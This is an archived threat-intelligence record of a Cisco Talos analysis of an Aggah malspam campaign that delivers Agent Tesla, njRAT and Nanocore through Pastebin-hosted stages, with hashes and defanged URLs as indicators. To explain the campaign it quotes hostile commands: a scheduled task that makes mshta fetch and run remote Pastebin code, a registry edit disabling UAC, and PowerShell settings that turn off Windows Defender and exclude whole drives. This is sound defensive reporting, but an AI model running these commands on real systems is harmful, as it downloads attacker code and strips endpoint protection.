{
	"id": "228ad72c-cbf1-4d6f-be5d-26c0c44701c8",
	"created_at": "2026-04-06T00:08:48.607437Z",
	"updated_at": "2026-04-10T03:33:12.460109Z",
	"deleted_at": null,
	"sha1_hash": "647a249f79356be4a65f832fb13bba46db401089",
	"title": "Upgraded Aggah malspam campaign delivers multiple RATs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 630826,
	"plain_text": "Upgraded Aggah malspam campaign delivers multiple RATs\r\nBy Asheer Malhotra\r\nPublished: 2020-04-29 · Archived: 2026-04-05 17:48:34 UTC\r\nWednesday, April 29, 2020 11:48\r\nCisco Talos has observed an upgraded version of a malspam campaign known to distribute multiple remote access trojans (RATs).\r\nThe infection chain utilized in the attacks is highly modularized.\r\nThe attackers utilize publicly available infrastructure such as Bitly and Pastebin (spread over a number of accounts) to direct and host their attack components.\r\nNetwork-based detection, although important, should be combined with endpoint protections to combat this threat and provide multiple layers of security.\r\nWhat’s New?\r\nCisco Talos has observed a new Aggah campaign consisting of the distribution of malicious Microsoft Office documents (maldocs) via malicious spam (malspam) emails, delivering a multi-stage infection to a target user’s endpoint.\r\nThe final payload of the infection consists of a variety of remote access trojan (RAT) families such as:\r\nAgent Tesla\r\nnjRAT\r\nNanocore RAT\r\nHow did it work?\r\nMany attackers and malware operators usually utilize their own infrastructure (or hacked domains) to act as delivery mechanisms for their infection chains. Consistent with previous Aggah campaigns, this campaign also focuses on the use of pastebin[.]com for all its infrastructure needs. 
However, this campaign now utilizes multiple Pastebin accounts to host different stages of the attack.\r\nThe key components of the attack are:\r\nStage 1: Malspam delivering documents with malicious macros.\r\nStage 2: Malicious VBScripts used to instrument the actual attack.\r\nStage 2A: Malicious .NET-based binaries for disabling security features on the endpoint.\r\nStage 3: Malicious VBScripts and .NET-based injectors and RATs (final payload).\r\nhttps://blog.talosintelligence.com/2020/04/upgraded-aggah-malspam-campaign.html\r\nPage 1 of 12\n\nSo what?\r\nThe Aggah campaign has been quite prolific recently and the attackers have used their own infrastructure, as well as hosting sites such as Pastebin, to host their infection components.\r\nThis new campaign, however, introduces a few key upgrades to the attack chain:\r\nUse of an additional .NET binary (and embedded VBScript and PowerShell scripts) to disable protection and detection mechanisms on the infected endpoint.\r\nDistribution of attack components (scripts and encoded MZs) across multiple free Pastebin accounts to modularize the attack infrastructure.\r\nUse of a new Pastebin PRO account to host all the final RAT payloads. This also indicates the move from the “hagga” to the “alphabets3” Pastebin account for continued operations (a pro account enables the attackers to modify the pastes and serve different malware at different points in time).\r\nInitial infection vector\r\nThis threat arrives on the endpoint typically as a malicious email. The email attempts to appear legitimate while being vague at the same time. 
This is done to trick the target end-user into opening the malicious attachment (maldoc) that activates the infection on the endpoint.\r\nA typical malspam email for this threat looks like:\r\nMalicious document analysis\r\nThe maldocs distributed by this threat contain a simple and effective VB macro script that is used to download the next stage of the infection and execute it on the endpoint.\r\nThe maldocs themselves are essentially empty and contain minimal to no content in them.\r\nSome examples of the names of the maldocs distributed by this threat:\r\nItems List.csv\r\nPO#422511 Hager.xls\r\nPurchase Order.xls\r\nRequest for Quotation.xls\r\nRFQ Air Shipment.csv\r\nRFQ List #422513.csv\r\nRFQ List #422513..csv\r\nRFQ List #422513 t.csv\r\nSpecification sheet and P.o 3053432.xls\r\nMalicious VBA analysis\r\nOnce opened, the malicious VBA contacts a shortened “j.mp” URL (redirects to pastebin[.]com) that points to the next stage of the infection. The second stage of the infection (in fact all the subsequent stages) is hosted on Pastebin URLs.\r\nTypical examples of the VB macro are:\r\nNewer versions of the macro also aim to establish persistence via the Windows registry for the second-stage payload’s execution using mshta.\r\nThe persistence is set up in the registry key:\r\nHKCU/Software/Microsoft/Windows/CurrentVersion/Run/\r\nInfection Stage 2: Mshta script\r\nThe second-stage payload downloaded by the maldoc’s macro and executed using mshta is an escaped VBScript.\r\nThe second-stage payload carries out the following actions:\r\n1. Set up a malicious scheduled task for another component (payload Stage 3 — Activate RAT payload) using the schtasks command, e.g.:\r\nschtasks /create /sc MINUTE /mo 70 /tn \u003ctask_name\u003e /tr \"\"mshta http://pastebin.com/raw/\u003cresource_id\u003e\"\" /F\r\n2. 
[Optional] Establish persistence for itself or another component (defined by another Pastebin URL).\r\n3. Download a .NET executable for Windows and execute it (payload stage 2A). This executable is designed to disable security features on the endpoint to evade detection.\r\nDeobfuscated second-stage payload:\r\nThe entire infection chain is illustrated here for a better understanding of the highly modularized attack:\r\nInfection Stage 2A: Elevate, evade, disable\r\nThis component is responsible for ensuring the seamless execution of the infection chain. It is implemented as a .NET-based executable that in turn executes an elevated VBScript to disable various protection mechanisms so that it can evade detection on the endpoint.\r\nThe executable extracts the VBS from its resources and dumps it into a randomly named VBS file. The executable also creates an ‘inf’ file that is then used to execute the malicious VBS using “cmstp” (cmstp.exe is used as a means of UAC bypass here).\r\nStructure of the inf file:\r\nIn order to ensure AV evasion the following actions are taken by the VBS:\r\n1. Ensure that the script is running with elevated privileges, else restart with elevated permissions.\r\n2. Disable UAC notifications by modifying the registry value “EnableLUA” using the command:\r\nC:\\Windows\\System32\\cmd.exe /k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f\r\n3. 
Disable Windows Defender features by running the PowerShell cmdlet “Set-MpPreference” with arguments:\r\n-DisableRealtimeMonitoring $true\r\n-DisableBehaviorMonitoring $true\r\n-DisableBlockAtFirstSeen $true\r\n-DisableIOAVProtection $true\r\n-DisableScriptScanning $true\r\n-SubmitSamplesConsent 2\r\n-MAPSReporting 0\r\n-HighThreatDefaultAction 6 -Force\r\n-ModerateThreatDefaultAction 6\r\n-LowThreatDefaultAction 6\r\n-SevereThreatDefaultAction 6\r\n4. Use PowerShell to create process and path exclusions for Windows Defender scans for:\r\nPaths:\r\nC:\\\r\nD:\\\r\nProcesses:\r\nMsbuild.exe\r\nCalc.exe\r\nA sample exclusions-enforcement script:\r\nInfection Stage 3\r\nThis payload is a VBScript designed to instrument a .NET-based injector component that activates a RAT payload (the final stage) on the infected endpoint.\r\nA typical stage 3 payload looks like:\r\nThe infection/injection process works as follows:\r\n1. The Stage 3 payload VBScript downloads the injector instrumentation script from a Pastebin URL.\r\n2. The injector instrumentation script decompresses the injector binary (a .NET-based DLL) and loads it into memory ready to be executed via an exported API of the DLL.\r\n3. The RAT payload is then downloaded and decoded.\r\n4. An API of the injector DLL is then called to inject the RAT payload into a specified benign process.\r\n5. The API accepts a benign executable’s name (such as “calc.exe”), spawns a new suspended process and uses process-hollowing to inject and activate the RAT payload on the infected endpoint.\r\nThis technique of decompressing the injector and subsequent injection of the final payload into a benign process using process-hollowing has been extensively used by the DarkComet malware family. 
As seen in this campaign (and other campaigns leveraging DarkComet), the injector component (DLL) is usually obfuscated to make analysis difficult.\r\nSub-component script that decompresses the injector module:\r\nFinal stage: RAT components\r\nThe final malware payloads served by such campaigns can vary from ransomware to RAT families. In the case of the campaign disclosed here, we have observed multiple families being distributed:\r\nAgent Tesla\r\nnjRAT\r\nNanocore RAT\r\nPastebin accounts\r\nThe following Pastebin accounts have been used to host malicious code for this campaign:\r\nhxxps://pastebin[.]com/u/bakeitup\r\nhxxps://pastebin[.]com/u/bakeitup1\r\nhxxps://pastebin[.]com/u/gogga4\r\nhxxps://pastebin[.]com/u/gogga7\r\nhxxps://pastebin[.]com/u/moneyneeded\r\nhxxps://pastebin[.]com/u/timenamoney\r\nhxxps://pastebin[.]com/u/hushpuppi44\r\nhxxps://pastebin[.]com/u/mompha1\r\nhxxps://pastebin[.]com/u/alphabates3\r\nOut of all these accounts, the “alphabates3” account stands out specifically. This is a PRO account. A pro account enables the operator to modify the content of already created pastes. Also, this account hosts all the RAT payload samples discovered in this campaign so far. Thus it is highly likely that the attackers modify existing pastes to re-instrument infection chains to deliver different malware at different points in time.\r\nConclusion\r\nThe actors behind this campaign are clearly motivated and continue to operate leveraging freely available infrastructure such as Pastebin, Bitly (j[.]mp) and others. We have also observed a steady evolution in their tactics, ranging from modularization of their attack chains to antivirus evasion tactics to thwart detections. The fact that these actors continue to distribute a wide variety of malware indicates that they are constantly growing their malware arsenal. 
The campaign started in January 2020 and is still ongoing. This campaign also shows us that while network-based detection is important, it must be complemented with system behavior analysis and endpoint protections.\r\nCoverage\r\nWays our customers can detect and block this threat are listed below.\r\nAdvanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware detailed in this post. Below is a screenshot showing how AMP can protect customers from this threat. Try AMP for free here.\r\nCisco Cloud Web Security (CWS) or Web Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.\r\nEmail Security can block malicious emails sent by threat actors as part of their campaign.\r\nNetwork Security appliances such as Next-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.\r\nThreat Grid helps identify malicious binaries and build protection into all Cisco Security products.\r\nUmbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.\r\nAdditional protections with context to your specific environment and threat data are available from the Firepower Management Center.\r\nOpen Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. The following Snort SIDs were released to detect this threat: 53745 - 53748.\r\nCisco AMP users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected with this specific threat. 
For specific OSqueries on this threat, click below:\r\nIOCs\r\nEmail messages:\r\naf70b67e70ba11e54deefc140b9fda0e7fe918f8bf1cf19eb184278c20ded621\r\nMaldocs:\r\na4931fd893b630efa9b4cf7c7ca1a1b7827ec2cef7d270baaa7737b4103be235\r\n39d059d7891d0b194face48f21093f6de9ae14e3f788f8a30c128398a0bf545c\r\nee913965822c4bbd2454a497431a82cb9d5fb360f51f313519fb132dc0532f67\r\n23d1a8e46a5713a39a7d636e9d22d3c24237a09f51248b7cfc421e99056c5c6b\r\n85f7e45904e059698dca69aefd0f49c1ac7434703f6d4eb913e95de5b8162df6\r\ncac81dd6d21cd8011f819fe998684e5f91710661b5cb7a2598fc0623dbe2b1ce\r\n1fc6f05a4a0947806e0c77492c6afe5a4f8ce20c4450ebbf2eb35818f8962210\r\n40d72cad9e7c10eb1b2415148cd641f8425419ace468ee3f418849d9675b8f0d\r\n6c6d611e629030213f065c058a969d3f19f91dfb2fe78c15acbabb9e687321ed\r\n733b3e58c8b7280cb351539dfd4f0cf57be967a595a4ac237369f6f80a3be926\r\n0eb1f2c85d6c1fcbb1546cec47d572245e291f3522e5fc49cfbe47f9415c8539\r\n20e0a74e41af798ff364ca479630d120ed0f9d990ad097f30e75f632d6a0c3f9\r\n238c97a1150ab97f075d40aec1fddff80a0cd5ad5c551e23c4144ff6dfc8f91d\r\nMalicious Scripts and MZs:\r\n1038e891dc459285da10f15d7ef679588f6d80a661c7f92dee44487003d0f76d\r\n35f523e5de8e240c9ae8f20d198a4bfde3877631390f24e2dc877223bdce5045\r\n73000931708116073e9bf7f326497564677fb9e36cd2195523e68376da2e44cd\r\n98ebeb1b1e6f97222680028d4e100c9bd0663cb953003382846432dc2adb23c2\r\nhttps://blog.talosintelligence.com/2020/04/upgraded-aggah-malspam-campaign.html\r\nPage 9 of 
12\n\n0a32978459907400ee525773ed2c7fd1521ceda18b75bd5f01645e9522eb5f81\r\n70370381401dafa66b29ec8029d382bfcffedd3cc5e44290cb3fefa728347730\r\n80707eab36cebfb26becd728e5dd155c22d0d272f1f62a9acd17abed6feccd8a\r\n7ec1cb6e477faea97fb78093c857099e4fdf72f535cab3433cdeb40a282e6359\r\ndbe17317d20e8d6b308b5ce32a53fd0b02b0d9914cafcceed06790a62da17c2d\r\nc9d7b63c671f24c049f711c361f1cb92780f838729b2acbe48bb906037347467\r\n913cc2d81a99ec7def735f16761390d0c4f47f28889ecf047525d2f86ff01011\r\ne82fea3940cd5d89202ef5a6fb236696d8364e232e7b6413a838b276fed916bb\r\nf55eb5d585d55b0cf4e00d0a97f8d9941f6547b0cfb314ac26f00a184cd3ab38\r\n595e06556d773d2c87671c817499f13500a910ddab31a0bd6f9e31fc8f46b5dc\r\n09050292abe61da2e39f0c16d2d10f8f7aa70b67b8a6c358724187131d1e3879\r\n23b2f5919d0b943effd748f6341e7dac16e2cc6f65d972f1cac8630c6ea6c524\r\ne742e2858352ad1da32cd45769ba6434aeea7465440667ffc1858c1ba0c8a1f6\r\n3a95d34385daf5fd45467767174ea2524d09396961d8f9ed180ff034604ba467\r\nf78311bc3b478929ccccd51c73e5e270f73db256a110821ca8adb6ef848ffa9d\r\ncba31bbe59853a2dd3a5b0c28b2d960c1292ea13571f08753079e067d2d1d6f3\r\nb2f2c8fe5e31a7c127f55aebae9e57e6347c432ba1c551a75f3372a373393a32\r\n28544b668b766853540aec755f73785ef0e644b21f1fa5f181d924a67f41acae\r\n0f2af9064dabe99260dac84facf4bd1e18051fa989a88e227e3b4684a9697274\r\n2dca36ce5e6d5e6ac382cda2562bc8783eb85053449cb790804b463a64effa67\r\n3ae524895fc071aa931d196767a4d6573e1cf57bfd500ccef7377696e080e702\r\n510b4ce5fb8c87120e28f3c06fb776564aedbcb483240b6b48aa1aada173e82b\r\n225f8bf058226e66ab7590c6f23235668cddb32e37a300d3994406875803c8c1\r\n0364b894e8c3234f2566b7368eecbdb264fa84e2ac7dd494acb9cce9a3ffc74e\r\n2e1af852e853a6841bb58891dea8529bd8458a1ee57595235a1632e71cb3ca59\r\n97931e1e8bdc57f2023b749b700139184c82ad646c97e9cf889f4a2c853f2408\r\nb0aae401bbca253a323b4591f41a69435617992f06e6df07e367184665edfd6e\r\n6045833390cdc30f440a9c5ec0922ae691e427a0e8d6b4750fe6a92e73cf1305\r\n3c657ad3b87ee8f3f666f0d3c93344a770e68119597f182fb128884cfccce35c\r\n2eb47fa90ad933efb1dccc
31f18b824ad560dd16e1b8aad3d7004bfc2018180a\r\n23e86df6daedf7aa13aded2f9123fdba812aa60bc30930a5db661a26958c4128\r\nc9ead4ece5af03b5050a4c541c5f89a8eea047a32e697e307d93979e58ccb987\r\n06924e5a0171b69f5e406317994e8f485d30ae404471aad9b5501497d1acfcf7\r\nShortened URLs:\r\nhxxp://j[.]mp/jaosidna8sxnasox\r\nhxxp://j[.]mp/ksxkssxksis8ijsjlsiajasldm\r\nhxxp://j[.]mp/ajsixans7xnasixn\r\nhxxp://j[.]mp/lkslsodkdfd9sods0kdsodo\r\nhxxp://j[.]mp/osasdkasdjsajasdiskdisdks\r\nhxxp://j[.]mp/asxlijlcsdoicdcli8lkjdclid9k\r\nhxxp://j[.]mp/sodkidkcikiksopsk9ksis6so\r\nhttps://blog.talosintelligence.com/2020/04/upgraded-aggah-malspam-campaign.html\r\nPage 10 of 12\n\nhxxp://j[.]mp/ksxkssxksis8ijsjlsiajasldm\r\nhxxp://j[.]mp/ksossksxmsxsxk8su7sjsx7j\r\nhxxp://j[.]mp/qidusldsidadkfmd9klkdkfk\r\nhxxp://j[.]mp/siadljas8asldkasd8asdl9sal\r\nhxxp://j[.]mp/jsakdiuksajsjaskkusk8ilas89\r\nhxxp://j[.]mp/nlkskjldu8sjlkdjkkljsmk\r\nhxxp://j[.]mp/asniasnxa8sxnasx\r\nUn-shortened URLs:\r\nhxxps://pastebin[.]com/SwJZ13TN\r\nhxxps://pastebin[.]com/RaA9aSiP\r\nhxxp://pastebin[.]com/YdNbhM9i\r\nhxxp://pastebin[.]com/rjjL3Q8k\r\nhxxps://pastebin[.]com/Xb567gn8\r\nhxxps://pastebin[.]com/guSD8kh8\r\nhxxps://pastebin[.]com/RCqXukvb\r\nhxxps://pastebin[.]com/5rM3ub4T\r\nhxxps://pastebin[.]com/8zispntq\r\nhxxp://pastebin[.]com/zKCiQThE\r\nhxxp://pastebin[.]com/U15y8Bqw\r\nhxxp://pastebin[.]com/vFGssbqR\r\nhxxps://pastebin[.]com/csVu7iV8\r\nhxxps://pastebin[.]com/pyN42ZYy\r\nhxxps://pastebin[.]com/PKuEeY0J\r\nhxxp://pastebin[.]com/TnesjzNM\r\nhxxps://pastebin[.]com/baejJ2xR\r\nhxxps://pastebin[.]com/2kzmttx1\r\nhxxp://pastebin[.]com/CSV8Dth1\r\nhxxp://pastebin[.]com/bDXVQe7R\r\nhxxps://pastebin[.]com/36RHyFyF\r\nhxxp://pastebin[.]com/CixwEA8N\r\nhxxps://pastebin[.]com/sM2bDvwq\r\nhxxps://pastebin[.]com/8YC77fsA\r\nhxxp://pastebin[.]com/uPTChJVZ\r\nhxxp://pastebin[.]com/VWyW3BuS\r\nhxxps://pastebin[.]com/MhUM7FWE\r\nhxxp://pastebin[.]com/fE0jKtBG\r\nhxxps://pastebin[.]com/T8BdJPKH\r\nhxxps://pastebin[.]com/rtrp8w
ut\r\nhxxp://pastebin[.]com/kQJkvnnN\r\nhxxp://pastebin[.]com/WYgTPRqh\r\nhxxps://pastebin[.]com/RaA9aSiP\r\nhttps://blog.talosintelligence.com/2020/04/upgraded-aggah-malspam-campaign.html\r\nPage 11 of 12\n\nhxxp://pastebin[.]com/8cP9QQjY\r\nhxxps://pastebin[.]com/bXms4JQj\r\nhxxps://pastebin[.]com/DGbjqyTK\r\nhxxp://pastebin[.]com/p826zZ7D\r\nhxxp://pastebin[.]com/Td6Tz6ex\r\nhxxps://pastebin[.]com/zyD07eCr\r\nhxxp://pastebin[.]com/gNnGrGZN\r\nhxxps://pastebin[.]com/7XXUx05w\r\nhxxps://pastebin[.]com/8EJgcnsp\r\nhxxp://pastebin[.]com/2RqBe3QU\r\nhxxp://pastebin[.]com/C3YRjE9a\r\nhxxps://pastebin[.]com/m3evTWbt\r\nhxxp://pastebin[.]com/a09Gx0W9\r\nhxxps://pastebin[.]com/wDEMiAAj\r\nhxxps://pastebin[.]com/mZZnwJtJ\r\nhxxp://pastebin[.]com/YwpcGxY4\r\nhxxp://pastebin[.]com/FnMCBZ0u\r\nhxxps://pastebin[.]com/pna1Wj3c\r\nhxxp://pastebin[.]com/dYM4umF9\r\nhxxps://pastebin[.]com/0zS4KLgn\r\nhxxps://pastebin[.]com/YnAjfeQs\r\nhxxp://pastebin[.]com/m0H2a9fp\r\nhxxp://pastebin[.]com/mPis0Xvi\r\nhxxps://pastebin[.]com/KsA0LByu\r\nhxxp://pastebin[.]com/m8ZcGw0A\r\nhxxps://pastebin[.]com/dVypbwUf\r\nhxxps://pastebin[.]com/uB8QAVxC\r\nhxxp://pastebin[.]com/7nU4s1hk\r\nhxxp://pastebin[.]com/arraKbed\r\nhxxps://pastebin[.]com/Z4yWKizU\r\nhxxp://pastebin[.]com/DRxejwps\r\nhxxps://pastebin[.]com/Q8sXxPy3\r\nhxxps://pastebin[.]com/zU5m82z3\r\nhxxp://pastebin[.]com/N1U2YYKH\r\nhxxps://pastebin[.]com/K8UT9fsu\r\nhxxp://pastebin[.]com/AW2dAGXF\r\nhxxps://pastebin[.]com/rF8FbZ6p\r\nhxxp://pastebin[.]com/huPdXJ7g\r\nhxxps://pastebin[.]com/GrJj48eQ\r\nSource: https://blog.talosintelligence.com/2020/04/upgraded-aggah-malspam-campaign.html\r\nhttps://blog.talosintelligence.com/2020/04/upgraded-aggah-malspam-campaign.html\r\nPage 12 of 12",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://blog.talosintelligence.com/2020/04/upgraded-aggah-malspam-campaign.html"
	],
	"report_names": [
		"upgraded-aggah-malspam-campaign.html"
	],
	"threat_actors": [
		{
			"id": "b0d34dd6-ee90-483b-bb6c-441332274160",
			"created_at": "2022-10-25T16:07:23.296754Z",
			"updated_at": "2026-04-10T02:00:04.526403Z",
			"deleted_at": null,
			"main_name": "Aggah",
			"aliases": [
				"Operation Red Deer",
				"Operation Roma225"
			],
			"source_name": "ETDA:Aggah",
			"tools": [
				"AgenTesla",
				"Agent Tesla",
				"AgentTesla",
				"Aggah",
				"Atros2.CKPN",
				"Bladabindi",
				"Jorik",
				"Nancrat",
				"NanoCore",
				"NanoCore RAT",
				"Negasteal",
				"Origin Logger",
				"Revenge RAT",
				"RevengeRAT",
				"Revetrat",
				"Warzone",
				"Warzone RAT",
				"ZPAQ",
				"Zurten",
				"njRAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "28851008-77b4-47eb-abcd-1bb5b3f19fc2",
			"created_at": "2023-06-20T02:02:10.254614Z",
			"updated_at": "2026-04-10T02:00:03.365336Z",
			"deleted_at": null,
			"main_name": "Hagga",
			"aliases": [
				"TH-157",
				"Aggah"
			],
			"source_name": "MISPGALAXY:Hagga",
			"tools": [
				"Agent Tesla"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434128,
	"ts_updated_at": 1775791992,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/647a249f79356be4a65f832fb13bba46db401089.pdf",
		"text": "https://archive.orkl.eu/647a249f79356be4a65f832fb13bba46db401089.txt",
		"img": "https://archive.orkl.eu/647a249f79356be4a65f832fb13bba46db401089.jpg"
	}
}